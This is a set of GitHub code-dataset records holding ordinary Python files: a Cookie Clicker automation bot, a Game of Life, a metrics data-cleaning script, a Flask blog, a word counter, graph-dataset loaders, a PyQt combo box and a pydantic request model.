5: \"buyAlchemy lab\",\r\n 4: \"buyShipment\",\r\n 3: \"buyMine\",\r\n 2: \"buyFactory\",\r\n 1: \"buyGrandma\",\r\n 0: \"buyCursor\"\r\n}\r\n\r\nwhile True:\r\n cookie.click()\r\n\r\n if time.time() > timeout:\r\n money = int(driver.find_element_by_id(\"money\").text.replace(\",\", \"\"))\r\n store = driver.find_elements_by_css_selector(\"#store b\")\r\n prices = []\r\n for item in store:\r\n try:\r\n prices.append(int(item.text.split(\" - \")[1].replace(\",\", \"\")))\r\n except IndexError:\r\n continue\r\n\r\n highest_price = 0\r\n for num in range(len(prices)):\r\n if money > prices[num] > highest_price:\r\n index = num\r\n highest_price = prices[num]\r\n\r\n driver.find_element_by_id(buy[index]).click()\r\n\r\n timeout += 5\r\n\r\n if time.time() > five_min:\r\n cookie_per_s = driver.find_element_by_id(\"cps\").text\r\n print(cookie_per_s)\r\n break\r\n","repo_name":"Mehtabalism/Cookie-Clicker-Game-Automation","sub_path":"Cookie_Clicker_Project.py","file_name":"Cookie_Clicker_Project.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14505337505","text":"import libtcodpy as 
libtcod\nfrom gamestuff import *\nimport data\nimport entitydata\nimport time\n\nclass World(object):\n def __init__(self, nwidth, nheight, alivechar, deadchar,char_option, rndgen):\n \n self.nwidth = nwidth\n self.nheight = nheight\n self.alive = alivechar\n self.dead = deadchar\n self.char_option = char_option\n self.population =[]\n self.generation = 0\n self.rndgen = rndgen\n\n self.con = libtcod.console_new(self.nwidth,self.nheight)\n\n self.init_world()\n\n def init_world(self):\n self.generation = 0\n self.population = [[ flip_coin(self.rndgen)\n for yy in range(self.nheight) ]\n for xx in range(self.nwidth) ]\n\n def check_stable(self):\n MAX_POP = 125\n num_unstable=0\n for yy in range(self.nheight):\n for xx in range(self.nwidth):\n if self.population[xx][yy] > 2 and self.population[xx][yy] <=MAX_POP:\n num_unstable+=1\n\n if num_unstable < 5 and self.generation >500:\n self.init_world() \n\n def get_world(self):\n libtcod.console_clear(self.con)\n for yy in range(self.nheight): \n for xx in range(self.nwidth):\n #my_color=self.random_color() \n my_color = self.get_color(self.population[xx][yy])\n libtcod.console_set_default_foreground(self.con, my_color)\n libtcod.console_print_ex(self.con, xx, yy, libtcod.BKGND_NONE, libtcod.LEFT, self.get_entity(self.population[xx][yy], self.char_option))\n return self.con\n\n def get_entity(self, entity, option):\n Max_ASCII = 125\n ASCII_offset = 23\n\n if option is 'symbol':\n\n if entity == 0:\n return ' '\n elif entity < 10:\n return '.'\n elif entity >=10 and entity < 20:\n return ','\n elif entity >=20 and entity < 30:\n return '_'\n elif entity >=30 and entity < 40:\n return '-'\n elif entity >=40 and entity < 50:\n return '|'\n elif entity >=50 and entity < 60:\n return '+'\n elif entity >=60 and entity < 70:\n return 'x'\n elif entity >=70 and entity < 80:\n return '='\n elif entity >=80 and entity < 90:\n return '#'\n elif entity >=90 and entity < 100:\n return 'o'\n else:\n return '@'\n elif option is 'ascii':\n if entity == 0:\n thechar = ' '\n elif entity < 10:\n thechar = entity\n elif entity >=10 and entity <= Max_ASCII - ASCII_offset:\n thechar = chr(entity + ASCII_offset)\n else:\n thechar = chr(Max_ASCII + 1)\n\n return str(thechar)\n\n def update(self):\n self.generation+=1\n new_population = []\n new_population = [[ 0\n for yy in range(self.nheight) ]\n for xx in range(self.nwidth) ]\n\n for yy in range(self.nheight): \n for xx in range(self.nwidth): \n\n if self.isalive(self.population[xx][yy]):\n state = self.alive\n else:\n state = self.dead\n\n num_neighbors = self.neighbors(xx,yy)\n #print str(xx) + '/' + str(yy) + ':' + str(state) + '\\t' + str(num_neighbors)\n if state == self.alive:\n #check rules 1 & 3 (rule 2, nothing happens)\n if num_neighbors <2 or num_neighbors >3:\n #rule 1: #neighbors < 2, alive->dead\n #rule 3: #neighbors = 4, alive->dead\n new_population[xx][yy] = 0\n #print '!!! DEATH !!!'\n else:\n new_population[xx][yy] = self.population[xx][yy]+1\n #print 'STAYIN ALIVE!'\n else: #dead\n #check rule 4\n if num_neighbors == 3:\n #rule 4: #neighbors = 3 alive, dead->alive\n new_population[xx][yy] = self.population[xx][yy]+1\n #print '??? 
BACK FROM DEATH ???'\n\n self.population = new_population\n \n def get_color(self, code):\n rr = 8\n gg = 8 + code*2\n bb = 8\n\n if gg > 255:\n rr = 128\n gg = 255\n bb = 128\n\n return libtcod.Color(rr,gg,bb)\n\n def random_color(self):\n rr = libtcod.random_get_int(0,0,255)\n gg = libtcod.random_get_int(0,0,255)\n bb = libtcod.random_get_int(0,0,255)\n return libtcod.Color(rr,gg,bb)\n\n def isalive(self,entity):\n if entity > 0:\n return True\n else:\n return False\n\n def neighbors(self, xx,yy):\n num_neighbors=0\n\n if xx != 0: #not far left\n if self.isalive(self.population[xx-1][yy]):\n num_neighbors+=1\n\n if xx !=self.nwidth-1: #not far right\n if self.isalive(self.population[xx+1][yy]):\n num_neighbors+=1 \n\n if yy != 0: #not far bottom\n if self.isalive(self.population[xx][yy-1]):\n num_neighbors+=1\n\n if yy != self.nheight-1: #not far top\n if self.isalive(self.population[xx][yy+1]):\n num_neighbors+=1\n\n if xx != 0 and yy != 0: #not bottom left\n if self.isalive(self.population[xx-1][yy-1]):\n num_neighbors+=1\n\n if xx != 0 and yy != self.nheight-1: #not top left\n if self.isalive(self.population[xx-1][yy+1]):\n num_neighbors+=1\n\n if xx != nwidth-1 and yy != 0: #not bottom right\n if self.isalive(self.population[xx+1][yy-1]):\n num_neighbors+=1\n\n if xx != nwidth-1 and yy != nheight-1: #not top right\n if self.isalive(self.population[xx+1][yy+1]):\n num_neighbors+=1\n\n return num_neighbors\n\n\n\n def __str__(self):\n ret=''\n for yy in range(self.nheight): \n ret= ret + '|' \n for xx in range(self.nwidth):\n ret= ret + str(self.population[xx][yy])\n ret= ret + '|\\n'\n return(ret)\n\n\n#create world\nnwidth = 100\nnheight = 60\nalivechar = '+'\ndeadchar = ' '\nchar_option = 'ascii'\nspeed = .1\ninc = 0.01\n\n# default generator\ndefault = libtcod.random_get_instance()\n# another random generator\nmy_random = libtcod.random_new()\n# a random generator with a specific seed\nmy_determinist_random = libtcod.random_new_from_seed(0xdeadbeef)\n\nworld = World(nwidth,nheight, alivechar, deadchar, char_option, my_determinist_random)\n\nlibtcod.console_set_custom_font('oryx_tiles3.png', libtcod.FONT_TYPE_GREYSCALE | libtcod.FONT_LAYOUT_TCOD, 32, 12)\nlibtcod.console_init_root(nwidth, nheight, 'johnstein\\'s Game of RogueLife!', False, libtcod.RENDERER_SDL)\nlibtcod.sys_set_fps(30)\n\nlibtcod.console_map_ascii_codes_to_font(256 , 32, 0, 5) #map all characters in 1st row\nlibtcod.console_map_ascii_codes_to_font(256+32, 32, 0, 6) #map all characters in 2nd row\n\nmouse = libtcod.Mouse()\nkey = libtcod.Key() \n\n#initialize population\n\n#enter game loop and check for user input\nwhile not libtcod.console_is_window_closed():\n libtcod.sys_check_for_event(libtcod.EVENT_KEY_PRESS | libtcod.EVENT_MOUSE, key, mouse)\n\n if key.vk == libtcod.KEY_ESCAPE:\n break\n if key.vk == libtcod.KEY_TAB:\n world.init_world()\n if key.vk == libtcod.KEY_UP:\n speed-=inc\n if key.vk ==libtcod.KEY_DOWN:\n speed+=inc\n if key.vk == libtcod.KEY_RIGHT:\n inc+=.01\n if key.vk ==libtcod.KEY_LEFT:\n inc-=.01\n\n if speed <0:\n speed = .001\n #display world\n con_world = world.get_world()\n libtcod.console_blit(con_world, 0, 0, nwidth, nheight, 0, 0, 0)\n libtcod.console_flush()\n #waitkey = libtcod.console_wait_for_keypress(True)\n \n #check rules and create new population\n #replace old population with new one\n time.sleep(speed)\n world.update()\n 
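# once the population stagnates, check_stable() re-seeds the board with a fresh random generation\n    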
world.check_stable()\n","repo_name":"jmbjr/dungeoneer","sub_path":"life.py","file_name":"life.py","file_ext":"py","file_size_in_byte":8271,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"71437180089","text":"'''\nAuthor: rocs\nDate: 2023-08-18 18:21:42\nLastEditors: rocs\nLastEditTime: 2023-08-18 19:49:47\nDescription: clean the data of core indicators\n'''\nimport numpy as np\nimport pandas as pd\nimport sys\nsys.path.append(sys.path[0][:-17])\n\nfrom helper import presetting\nfrom helper import metricsPreset as mp\nfrom helper import helperFuncs as hf\nfrom dataCollection.rq1and2 import importProjectsList as pl \n\nPREFIX = presetting.PREFIX\n\n#read csv projects.csv\ndf_pl = pl.df\nprojectList = df_pl['ProjectName'].tolist()\nmetricTopics = mp.allMetrics\n\n\n\ndef dataClean(projectName, TQI3 = False):\n #read csv, if the metricTopic is in the subjMetrics list, then read the csv in the levels folder\n if (TQI3 == True):\n df = pd.read_csv(PREFIX + \"/docs/output/RQ2/uncleaned/\" + projectName + \"_3.csv\")\n else:\n df = pd.read_csv(PREFIX + \"/docs/output/RQ2/uncleaned/\" + projectName + \"_4.csv\") \n\n #change the 'Date' type from string to datetime\n df['Date'] = pd.to_datetime(df['Date'])\n #remove unnamed column\n df = df.loc[:, ~df.columns.str.contains('^Unnamed')]\n \n subMetricList = df.columns.tolist()\n subMetricList.pop(0)\n #change all other columns' type to string\n for m in subMetricList:\n df[m] = df[m].astype(str)\n \n #For these two metrics, we only need the values in right TQI Version\n if (TQI3 == False):\n #drop rows whose 'TQI Version' are 3.11\n df = df.drop(df[df['TQI Version'] == '3.11'].index)\n suffix = '4'\n else:\n #drop rows whose 'TQI Version' are 3.11\n df = df.drop(df[df['TQI Version'] != '3.11'].index)\n suffix = '3'\n \n\n #reset the index\n df_clear = df.reset_index(drop=True)\n\n\n #change all rows whose 'Value' contains 'ERROR' or '<>' to NaN\n for m in subMetricList:\n df_clear.loc[df_clear[m].str.contains('ERROR') == True, m] = '0'\n df_clear.loc[df_clear[m].str.contains('= 95]\n\n #some column values are '0', so we drop these rows,we use subMetricList to remove\n #remove 'TICS Version', 'TQI Version' from subMetricList\n subMetricList.remove('TQI Version')\n #remove all rows whose column values are string '0'\n df_clear = df_clear.drop(df_clear[(df_clear[subMetricList] == 0).all(axis=1)].index)\n\n\n #remove all rows which are completely same as its last row, keep the first one\n df_clear_dropSameValues = df_clear.drop_duplicates(subset=subMetricList, keep='first')\n df_clear_dropSameValues = df_clear_dropSameValues.reset_index(drop=True)\n\n #output the cleaned csv\n #if row number is less than 2, then we do not output the csv\n df_clear.to_csv(PREFIX + \"/docs/output/RQ2/cleaned/\" + projectName + '_' + suffix + \".csv\")\n df_clear_dropSameValues.to_csv(PREFIX + \"/docs/output/RQ2/cleaned/\" + projectName + \"_dropSameValues\"+ '_' + suffix + \".csv\")\n\n \n\n# projectList = ['ZigBee-Platform-EFR32-MG13']\n# metricTopics = ['AI']\n\nfor i in projectList:\n #if there is exception, then save the exception and continue\n # dataClean(i, TQI3 = False)\n try:\n dataClean(i, TQI3 = False)\n dataClean(i, TQI3 = True)\n except Exception as e:\n #save the error project name and metric name into a txt file\n with open(PREFIX + \"/docs/output/error/indiDataClean_\" + hf.getDatetime() + \".txt\", \"a\") as f:\n f.write(str(e) + \"\\n\" +\"Error in \" + i + \"!\" + \"\\n\\n\")\n 
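# the error was logged above; skip this project and keep the batch running\n        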
continue\n\nprint(\"Data Clean Done!\")","repo_name":"rocsmytune/tiobe_projectCode","sub_path":"tiobe_main/dataAnalysis/rq2/indDataClean.py","file_name":"indDataClean.py","file_ext":"py","file_size_in_byte":4583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73217898170","text":"from multiprocessing import Process, Pipe\n\n\nclass Timeout:\n def __init__(self, func, timeout):\n self.func = func\n self.timeout = timeout\n\n def __call__(self, *args, **kargs):\n def pmain(pipe, func, args, kargs):\n result = None\n\n try:\n result = func(*args, **kargs)\n except Exception:\n pass\n\n pipe.send(result)\n\n parent_pipe, child_pipe = Pipe()\n\n p = Process(target=pmain, args=(child_pipe, self.func, args, kargs))\n p.start()\n p.join(self.timeout)\n\n result = None\n\n if p.is_alive():\n p.terminate()\n result = None\n raise TimeoutError\n\n result = parent_pipe.recv()\n\n return result\n","repo_name":"chris-ritsen/network-audio-controller","sub_path":"netaudio/utils/timeout.py","file_name":"timeout.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":136,"dataset":"github-code","pt":"77"} +{"seq_id":"42165111819","text":"from flask import Flask, render_template\nimport requests\n\napp = Flask(__name__)\nblog_url = \"https://api.npoint.io/c790b4d5cab58020d391\"\n\n# Get the posts from the json/API\nresponse = requests.get(blog_url)\nall_posts = response.json()\n# all_posts = [post for post in posts_data]\nnumber_of_posts = len(all_posts)\n\n\n@app.route('/')\ndef home():\n return render_template(\"index.html\", posts=all_posts, total_posts=number_of_posts)\n\n\n@app.route('/post/')\ndef get_post(post_index):\n id = int(post_index)-1\n return render_template(\"post.html\", post=all_posts[id])\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"luanbartole/100-days-of-code-python","sub_path":"03_Intermediate+/Day 57 - Templating with Jinja in Flask Applications/057_blog-capstone-1.py","file_name":"057_blog-capstone-1.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40427748419","text":"from PyQt4 import QtCore, QtGui\n\nfrom library.crbcombobox import CRBComboBox\nfrom library.TableModel import CTableModel, CTextCol, CRefBookCol\nfrom library.Utils import forceRef, forceStringEx, toVariant\n\nfrom Ui_FormularyComboBoxPopup import Ui_FormularyComboBoxPopup\n\n\nclass CFormularyComboBox(CRBComboBox):\n def __init__(self, parent, filter = None):\n CRBComboBox.__init__(self, parent)\n self.setTable('vrbDrugFormulary_Item')\n self._filter = filter\n self._popup = None\n\n def setQValue(self, var):\n self.setValue(forceRef(var))\n\n def showPopup(self):\n if not self._popup:\n self._popup = CFormularyComboBoxPopup(self, self._filter)\n self.connect(self._popup,QtCore.SIGNAL('itemSelected(QVariant)'), self.setQValue)\n #self._popup.setDefaults(self.defaultClass, self.defaultType)\n pos = self.rect().bottomLeft()\n pos = self.mapToGlobal(pos)\n size = self._popup.sizeHint()\n width= max(size.width(), self.width())\n size.setWidth(width)\n screen = QtGui.QApplication.desktop().availableGeometry(pos)\n pos.setX( max(min(pos.x(), screen.right()-size.width()), screen.left()) )\n pos.setY( max(min(pos.y(), screen.bottom()-size.height()), screen.top()) )\n self._popup.move(pos)\n self._popup.resize(size)\n self._popup.show()\n\nclass CFormularyComboBoxPopup(QtGui.QFrame, 
Ui_FormularyComboBoxPopup):\n __pyqtSignals__ = ('itemSelected(int)',\n )\n\n def __init__(self, parent=None, filter=None):\n QtGui.QFrame.__init__(self, parent, QtCore.Qt.Popup)\n self._parent = parent\n self._filter = filter\n self.setupUi(self)\n self.model = CFormularyModel(self)\n self.tblFormulary.setModel(self.model)\n self.tblFormulary.setSelectionMode(QtGui.QAbstractItemView.SingleSelection)\n\n self.initSearch()\n\n def show(self):\n self.resetSearch()\n self.applySearch()\n self.tblFormulary.setFocus()\n id = self._parent.value()\n if id:\n self.tblFormulary.setCurrentItemId(self._parent.value())\n else:\n self.tblFormulary.setCurrentRow(0)\n QtGui.QFrame.show(self)\n\n def selectCurrentItem(self):\n id = self.tblFormulary.currentItemId()\n self.emit(QtCore.SIGNAL('itemSelected(QVariant)'), toVariant(id))\n self.hide()\n\n def initSearch(self):\n self._code = ''\n self._name = ''\n self._tradeName = ''\n self._mnn = ''\n\n def resetSearch(self):\n self.initSearch()\n self.edtCode.setText(self._code)\n self.edtName.setText(self._name)\n self.edtTradeName.setText(self._tradeName)\n self.edtMnn.setText(self._mnn)\n\n def applySearch(self):\n self._code = forceStringEx(self.edtCode.text())\n self._name = forceStringEx(self.edtName.text())\n self._tradeName = forceStringEx(self.edtTradeName.text())\n self._mnn = forceStringEx(self.edtMnn.text())\n\n db = QtGui.qApp.db\n cond = []\n tableFormulary = db.table('vrbDrugFormulary_Item')\n table = tableFormulary\n\n if self._code:\n cond.append(tableFormulary['code'].like(self._code))\n if self._name:\n cond.append(tableFormulary['name'].like('%' + self._name + '%'))\n if self._tradeName:\n cond.append(tableFormulary['tradeName'].like('%' + self._tradeName + '%'))\n if self._mnn:\n cond.append(tableFormulary['mnn'].like('%' + self._mnn + '%'))\n if self._filter and len(self._filter) > 0:\n cond.append(self._filter)\n tableTarget = tableFormulary\n idList = db.getIdList(table, tableTarget['id'].name(), cond, [tableTarget['name'].name(), tableTarget['code'].name()] )\n self.tblFormulary.setIdList(idList)\n\n @QtCore.pyqtSlot(QtCore.QModelIndex)\n def on_tblFormulary_clicked(self, index):\n self.selectCurrentItem()\n\n @QtCore.pyqtSlot(QtGui.QAbstractButton)\n def on_buttonBox_clicked(self, button):\n buttonCode = self.buttonBox.standardButton(button)\n if buttonCode == QtGui.QDialogButtonBox.Apply:\n self.applySearch()\n self.tabWidget.setCurrentIndex(0)\n elif buttonCode == QtGui.QDialogButtonBox.Reset:\n self.resetSearch()\n\n def keyPressEvent(self, event):\n if event.key() in (QtCore.Qt.Key_Return, QtCore.Qt.Key_Enter):\n if self.tabWidget.currentIndex():\n self.applySearch()\n self.tabWidget.setCurrentIndex(0)\n else:\n if self.tblFormulary.currentItemId():\n self.selectCurrentItem()\n QtGui.QFrame.keyPressEvent(self, event)\n\n\nclass CFormularyModel(CTableModel):\n def __init__(self, parent):\n CTableModel.__init__(self, parent, [\n CTextCol( u'Код', ['code'], 20),\n CTextCol( u'Формулярное наименование', ['name'], 60),\n CRefBookCol( u'Торговое наименование', ['tradeName_id'], 'dlo_rbTradeName', 60)\n ], 'vrbDrugFormulary_Item' )\n","repo_name":"dio4/vista_1","sub_path":"library/FormularyComboBox.py","file_name":"FormularyComboBox.py","file_ext":"py","file_size_in_byte":5233,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"38236100443","text":"#!/usr/bin/python3\r\n# CYB333: Final Course Project\r\n#Project Title: Word Frequency \r\n#Author: CMDCMstr3\r\n#Date: June 22, 
2021\r\n\r\n\r\nimport string\r\n# Opens and reads text file.\r\ntext = open(\"PythonMission.txt\", \"r\") \r\n# This will create the dictionary that will be used.\r\nd = dict() \r\n# This creates a loop through PythonMission.txt\r\nfor line in text:\r\n# Changes all words in text to lower case.\t\r\n\tline = line.lower()\r\n# Removes all punctuation. Note: It took me a while to figure this out.\t\r\n\tline = line.translate(line.maketrans(\"\", \"\", string.punctuation))\r\n\t\r\n\twords = line.split(\" \")\r\n# starts an iteration through each word of the current line, inside the file loop so every line is counted.\r\n\tfor word in words:\r\n\t\r\n\t\tif word in d:\r\n# Counts each word by one incrementally.\t\t\r\n\t\t\td[word] = d[word] + 1\r\n\t\r\n\t\telse:\r\n# Those words that appear once are assigned a 1. \t\r\n\t\t\td[word] = 1\r\n# Printing format for words in the dictionary.\r\nfor key in list(d.keys()):\r\n\t\r\n\tprint(key + \": \", d[key], ', ', sep='', end='')\r\n\t\r\n\t \r\n\r\n","repo_name":"CMDCMstr3/CYB333-Word-Freq-Project","sub_path":"CMDCMstr3 Word Freq Project.py","file_name":"CMDCMstr3 Word Freq Project.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13513410647","text":"import numpy as np\nimport scipy.sparse as sp\nimport torch as th\nfrom sklearn.preprocessing import OneHotEncoder\n \ndef encode_onehot(labels):\n    labels = labels.reshape(-1, 1)\n    enc = OneHotEncoder()\n    enc.fit(labels)\n    labels_onehot = enc.transform(labels).toarray()\n    return labels_onehot\n\ndef preprocess_features(features):\n    \"\"\"Row-normalize feature matrix and convert to tuple representation\"\"\"\n    rowsum = np.array(features.sum(1))\n    r_inv = np.power(rowsum, -1).flatten()\n    r_inv[np.isinf(r_inv)] = 0.\n    r_mat_inv = sp.diags(r_inv)\n    features = r_mat_inv.dot(features)\n    return features.todense()\n\ndef get_pos(pos):\n    row = pos.row\n    col = pos.col\n    p = []\n    flag = 0\n    temp = []\n    for i,j in zip(row,col):\n        if flag!=i:\n            temp = th.stack(temp)\n            p.append(temp)\n            temp = []\n            flag = flag + 1\n        temp.append(th.tensor(j).long())\n    p.append(th.stack(temp))\n    return p\n\ndef normalize_adj(adj):\n    \"\"\"Symmetrically normalize adjacency matrix.\"\"\"\n    adj = sp.coo_matrix(adj)\n    rowsum = np.array(adj.sum(1))\n    d_inv_sqrt = np.power(rowsum, -0.5).flatten()\n    d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.\n    d_mat_inv_sqrt = sp.diags(d_inv_sqrt)\n    return adj.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt).tocoo()\n\n\ndef sparse_mx_to_torch_sparse_tensor(sparse_mx):\n    \"\"\"Convert a scipy sparse matrix to a torch sparse tensor.\"\"\"\n    sparse_mx = sparse_mx.tocoo().astype(np.float32)\n    indices = th.from_numpy(\n        np.vstack((sparse_mx.row, sparse_mx.col)).astype(np.int64))\n    values = th.from_numpy(sparse_mx.data)\n    shape = th.Size(sparse_mx.shape)\n    return th.sparse.FloatTensor(indices, values, shape)\n\n\ndef load_acm(ratio, type_num):\n    # The order of node types: 0 p 1 a 2 s\n    # 4019 7167 60\n    path = \"../data/acm/\"\n    label = np.load(path + \"labels.npy\").astype('int32')\n    label = encode_onehot(label)\n    \n    nei_a = sp.load_npz(path + \"nei_a.npz\")\n    nei_s = sp.load_npz(path + \"nei_s.npz\")\n    feat_p = sp.load_npz(path + \"p_feat.npz\")\n    feat_a = sp.load_npz(path + \"a_feat.npz\")\n    feat_s = sp.eye(type_num[2])\n    pap = sp.load_npz(path + \"pap.npz\")\n    psp = sp.load_npz(path + \"psp.npz\")\n    train = [np.load(path + \"train_\" + str(i) + \".npy\") for i in ratio]\n    test = [np.load(path + \"test_\" + str(i) + \".npy\") for i in ratio]\n    val = [np.load(path + \"val_\" + 
str(i) + \".npy\") for i in ratio]\n\n label = th.FloatTensor(label)\n nei_a = sparse_mx_to_torch_sparse_tensor(nei_a)\n nei_s = sparse_mx_to_torch_sparse_tensor(nei_s)\n feat_p = th.FloatTensor(preprocess_features(feat_p))\n feat_a = th.FloatTensor(preprocess_features(feat_a))\n feat_s = th.FloatTensor(preprocess_features(feat_s))\n # pap pap type = \n\n #pap = sparse_mx_to_torch_sparse_tensor(normalize_adj(pap))\n #psp = sparse_mx_to_torch_sparse_tensor(normalize_adj(psp))\n train = [th.LongTensor(i) for i in train]\n val = [th.LongTensor(i) for i in val]\n test = [th.LongTensor(i) for i in test]\n\n # print(feat_p.size())\n # print(feat_p)\n return [nei_a, nei_s], [feat_p, feat_a, feat_s], [pap, psp], label, train, val, test\n\n\ndef load_dblp(ratio, type_num):\n path = \"../data/dblp/\"\n label = np.load(path + \"labels.npy\").astype('int32')\n label = encode_onehot(label)\n feat_a = sp.load_npz(path + \"a_feat.npz\").astype(\"float32\")\n feat_p = sp.load_npz(path + \"p_feat.npz\").astype(\"float32\")\n feat_c = sp.eye(type_num[3])\n feat_t = np.load(path+\"t_feat.npz\")\n\n nei_ap = sp.load_npz(path + \"nei_ap.npz\")\n nei_apc = sp.load_npz(path + \"nei_apc.npz\")\n nei_apcp = sp.load_npz(path + \"nei_apcp.npz\")\n nei_apt = sp.load_npz(path + \"nei_apt.npz\")\n nei_aptp = sp.load_npz(path + \"nei_aptp.npz\")\n\n apa = sp.load_npz(path + \"apa.npz\") \n apcpa = sp.load_npz(path + \"apcpa.npz\")\n aptpa = sp.load_npz(path + \"aptpa.npz\") \n\n train = [np.load(path + \"train_\" + str(i) + \".npy\") for i in ratio]\n test = [np.load(path + \"test_\" + str(i) + \".npy\") for i in ratio]\n val = [np.load(path + \"val_\" + str(i) + \".npy\") for i in ratio]\n \n label = th.FloatTensor(label)\n\n nei_ap = sparse_mx_to_torch_sparse_tensor(nei_ap)\n nei_apc = sparse_mx_to_torch_sparse_tensor(nei_apc)\n nei_apcp = sparse_mx_to_torch_sparse_tensor(nei_apcp)\n nei_apt = sparse_mx_to_torch_sparse_tensor(nei_apt)\n nei_aptp = sparse_mx_to_torch_sparse_tensor(nei_aptp)\n \n feat_p = th.FloatTensor(preprocess_features(feat_p))\n feat_a = th.FloatTensor(preprocess_features(feat_a))\n feat_t = th.FloatTensor(feat_t)\n feat_c = th.FloatTensor(preprocess_features(feat_c))\n\n train = [th.LongTensor(i) for i in train]\n val = [th.LongTensor(i) for i in val]\n test = [th.LongTensor(i) for i in test]\n\n return [nei_ap, nei_apc, nei_apcp, nei_apt, nei_aptp], [feat_a, feat_p, feat_t, feat_c], [apa, apcpa, aptpa], label, train, val, test\n\n\ndef load_aminer(ratio, type_num):\n path = \"../data/aminer/\"\n label = np.load(path + \"labels.npy\").astype('int32')\n label = encode_onehot(label)\n nei_a = sp.load_npz(path + \"nei_a.npz\")\n nei_r = sp.load_npz(path+ \"nei_r.npz\")\n\n feat_p_pap = np.load(path + \"feat_p_pap.w1000.l100.npy\").astype('float')\n feat_p_prp = np.load(path + \"feat_p_prp.w1000.l100.npy\").astype('float')\n feat_a = np.load(path + \"feat_a.w1000.l100.npy\").astype('float')\n feat_r = np.load(path + \"feat_r.w1000.l100.npy\").astype('float')\n\n feat_p = th.stack((th.FloatTensor(feat_p_pap),th.FloatTensor(feat_p_prp)))\n feat_a = th.FloatTensor(feat_a)\n feat_r = th.FloatTensor(feat_r)\n\n\n # feat_p = feat_p.mean(axis=0)\n # feat_p = sp.eye(type_num[0])\n # feat_a = sp.eye(type_num[1])\n # feat_r = sp.eye(type_num[2])\n # feat_p = th.FloatTensor(preprocess_features(feat_p))\n # feat_a = th.FloatTensor(preprocess_features(feat_a))\n # feat_r = th.FloatTensor(preprocess_features(feat_r))\n\n\n pap = sp.load_npz(path + \"pap.npz\")\n prp = sp.load_npz(path + \"prp.npz\")\n train = 
[np.load(path + \"train_\" + str(i) + \".npy\") for i in ratio]\n test = [np.load(path + \"test_\" + str(i) + \".npy\") for i in ratio]\n val = [np.load(path + \"val_\" + str(i) + \".npy\") for i in ratio]\n\n label = th.FloatTensor(label)\n nei_a = sparse_mx_to_torch_sparse_tensor(nei_a)\n nei_r = sparse_mx_to_torch_sparse_tensor(nei_r)\n\n train = [th.LongTensor(i) for i in train]\n val = [th.LongTensor(i) for i in val]\n test = [th.LongTensor(i) for i in test]\n return [nei_a, nei_r], [feat_p, feat_a, feat_r], [pap, prp], label, train, val, test\n\n\ndef load_imdb(ratio, type_num):\n # m a d k\n # 4275 5432 2083 7313\n path = \"../data/imdb/\" \n label = np.load(path + \"labels.npy\").astype('int32')\n label = encode_onehot(label)\n label = th.FloatTensor(label)\n\n feat_m = sp.load_npz(path + \"m_feat.npz\").astype(\"float32\")\n feat_a = sp.eye(type_num[1])\n feat_d = sp.eye(type_num[2])\n feat_k = sp.eye(type_num[3])\n\n nei_a = sp.load_npz(path + \"nei_a.npz\")\n nei_d = sp.load_npz(path + \"nei_d.npz\")\n nei_k = sp.load_npz(path + \"nei_k.npz\")\n nei_a = sparse_mx_to_torch_sparse_tensor(nei_a)\n nei_d = sparse_mx_to_torch_sparse_tensor(nei_d)\n nei_k = sparse_mx_to_torch_sparse_tensor(nei_k)\n\n mam = sp.load_npz(path + 'mam.npz')\n mdm = sp.load_npz(path + 'mdm.npz')\n mkm = sp.load_npz(path + 'mkm.npz')\n\n\n train = [np.load(path + \"train_\" + str(i) + \".npy\") for i in ratio]\n test = [np.load(path + \"test_\" + str(i) + \".npy\") for i in ratio]\n val = [np.load(path + \"val_\" + str(i) + \".npy\") for i in ratio]\n\n feat_m = th.FloatTensor(preprocess_features(feat_m))\n feat_a = th.FloatTensor(preprocess_features(feat_a))\n feat_d = th.FloatTensor(preprocess_features(feat_d))\n feat_k = th.FloatTensor(preprocess_features(feat_k))\n\n train = [th.LongTensor(i) for i in train]\n val = [th.LongTensor(i) for i in val]\n test = [th.LongTensor(i) for i in test]\n return [nei_a, nei_d, nei_k], [feat_m, feat_a, feat_d, feat_k], [mam, mdm, mkm], label, train, val, test\n\n\ndef load_data(dataset, ratio, type_num):\n if dataset == \"acm\":\n data = load_acm(ratio, type_num)\n elif dataset == \"dblp\":\n data = load_dblp(ratio, type_num)\n elif dataset == \"aminer\":\n data = load_aminer(ratio, type_num)\n elif dataset == 'imdb':\n data = load_imdb(ratio, type_num)\n return data\n","repo_name":"jianxiangyu/MEOW","sub_path":"code_adameow/utils/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":8432,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"77"} +{"seq_id":"26332753666","text":"from pydantic import BaseModel, Field, ValidationInfo, field_validator\nfrom models.base.enums import Language, OperatingSystems\nfrom utils import regex\n\n\nclass UserUpdateRequest(BaseModel):\n first_name: str = Field(default=None, pattern=regex.NAME)\n last_name: str = Field(default=None, pattern=regex.NAME)\n email: str = Field(default=None, pattern=regex.EMAIL)\n mobile: str = Field(default=None, pattern=regex.MSISDN)\n profile_pic_url: str = Field(default=None, pattern=regex.URL)\n firebase_token: str | None = None\n os: OperatingSystems | None = None\n language: Language | None = None\n\n model_config = {\n \"json_schema_extra\": {\n \"examples\": [\n {\n \"first_name\": \"John\",\n \"last_name\": \"Doo\",\n \"mobile\": \"7999228903\",\n \"email\": \"myname@gmail.com\",\n \"profile_pic_url\": \"https://pics.com/myname.png\",\n \"language\": \"en\",\n \"os\": \"ios\",\n \"firebase_token\": \"long_string\"\n }\n ]\n }\n 
